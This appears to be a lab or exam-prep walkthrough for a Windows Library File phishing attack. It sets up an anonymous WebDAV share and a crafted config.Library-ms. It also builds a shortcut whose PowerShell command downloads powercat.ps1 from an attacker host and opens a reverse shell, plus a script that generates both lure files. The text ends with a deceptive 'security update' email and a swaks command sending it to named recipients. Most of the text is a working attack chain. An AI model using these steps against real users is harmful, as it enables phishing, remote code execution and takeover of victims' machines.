Code execution via Windows Library Files
Enable a WebDAV share on Kali
The library file will point the victim's Explorer at this share, so the shortcut has to end up in this directory:
mkdir /home/kali/webdav
cd ~/webdav
python -m venv .venv
source .venv/bin/activate
python -m pip install -U pip
python -m pip install wsgidav cheroot lxml
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous -r /home/kali/webdav/
--auth=anonymous lets Explorer mount the share without credentials. Binding port 80 requires root (or CAP_NET_BIND_SERVICE); if the bind fails, run the wsgidav binary from the venv with sudo.
Create two files on the Windows machine
On the Windows machine, open VS Code and create a new file named config.Library-ms with the content below. The <url> element is what makes Explorer mount the WebDAV share when the library is opened; it must point at the host running wsgidav (replace 192.168.119.2 with your attacker IP):
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>http://192.168.119.2</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
Save it on the Desktop.
Create a shortcut named install
Right-click on the Desktop, choose New > Shortcut, and enter the following as the item's location (replace 192.168.119.3 with your attacker IP; that host serves powercat.ps1 on port 8000 and runs the listener on port 4444):
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.3:8000/powercat.ps1');powercat -c 192.168.119.3 -p 4444 -e powershell"
Name the shortcut install; Windows saves it as install.lnk on the Desktop.
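The two Windows-side files can also be produced with a script instead of VS Code and the New > Shortcut dialog. The following PowerShell is an added example, not part of the original notes or of any tool they use; the IPs, ports and output directory are assumptions (set them to your attacker host), and it relies on the WScript.Shell COM object that ships with Windows to write the .lnk. It finishes by parsing the library file back and reading the shortcut back, so a typo in the URL or arguments is caught before the files are copied to the WebDAV directory.

```powershell
# Added example (not part of the original notes): build config.Library-ms and
# install.lnk on the Windows machine with PowerShell instead of VS Code and the
# New > Shortcut dialog. The IPs, ports and output directory are assumptions;
# set them to your own attacker host.
param(
    [string]$WebDavUrl   = 'http://192.168.119.2',   # host running wsgidav on port 80
    [string]$PayloadHost = '192.168.119.3',          # host serving powercat.ps1 and running nc
    [int]   $PayloadPort = 4444,                     # must match the nc -nvlp port
    [string]$OutDir      = "$env:USERPROFILE\Desktop"
)

$libPath = Join-Path $OutDir 'config.Library-ms'
$lnkPath = Join-Path $OutDir 'install.lnk'

# Library description: <url> is the attacker-controlled field that matters;
# Explorer mounts it as a WebDAV share when the library is opened.
$libraryXml = @"
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>$WebDavUrl</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"@
# Write UTF-8 without a BOM so the bytes match what the XML declaration claims.
[System.IO.File]::WriteAllText($libPath, $libraryXml, (New-Object System.Text.UTF8Encoding $false))

# Shortcut: the same target and arguments the New > Shortcut dialog would store.
$stager = "IEX(New-Object System.Net.WebClient).DownloadString('http://${PayloadHost}:8000/powercat.ps1');" +
          "powercat -c $PayloadHost -p $PayloadPort -e powershell"
$shell = New-Object -ComObject WScript.Shell
$lnk = $shell.CreateShortcut($lnkPath)
$lnk.TargetPath = 'powershell.exe'
$lnk.Arguments  = "-c `"$stager`""
$lnk.Save()

# Sanity checks before the files are copied to the WebDAV directory.
$doc = [xml](Get-Content -Raw $libPath)
$url = $doc.libraryDescription.searchConnectorDescriptionList.searchConnectorDescription.simpleLocation.url
if ($url -ne $WebDavUrl) { throw "library url is '$url', expected '$WebDavUrl'" }
$check = $shell.CreateShortcut($lnkPath)
if ($check.TargetPath -notmatch 'powershell\.exe$' -or $check.Arguments -notmatch "-p $PayloadPort ") {
    throw "shortcut does not contain the expected target/arguments"
}
"wrote $libPath and $lnkPath"
```

Run it as `.\make-lure.ps1 -WebDavUrl http://<kali-ip> -PayloadHost <kali-ip>` (the script name is an assumption). CreateShortcut returns the resolved full path of powershell.exe when the .lnk is read back, which is why the check matches on the file name suffix rather than comparing the whole string.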
Transfer both files to the WebDAV directory
In the WebDAV directory on Kali, write the mail body:
nano body.txt
Hey! I checked mail and discovered that the previously used staging script still exists in the Git logs. I'll remove it for security reasons. On an unrelated note, please install the new security features on your workstation. For this, download the attached file, double-click on it, and execute the configuration shortcut within. Thanks! John
Copy powercat.ps1 into the same directory:
cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
Then copy config.Library-ms and install.lnk from the Windows machine into the WebDAV directory as well.
Port 80 is taken by wsgidav, so serve powercat.ps1 from a second HTTP server, and start the listener, each in its own terminal from the WebDAV directory:
python3 -m http.server 8000
nc -nvlp 4444
The listener port must match the -p value in the shortcut (4444).
Now send the email
Only the library file is attached; the shortcut is fetched from the WebDAV share when the victim opens the library in Explorer. -ap prompts for the SMTP password of the sending account:
sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap
When the victim double-clicks install inside the opened library, powercat.ps1 is downloaded from port 8000 and the reverse shell arrives on the nc listener.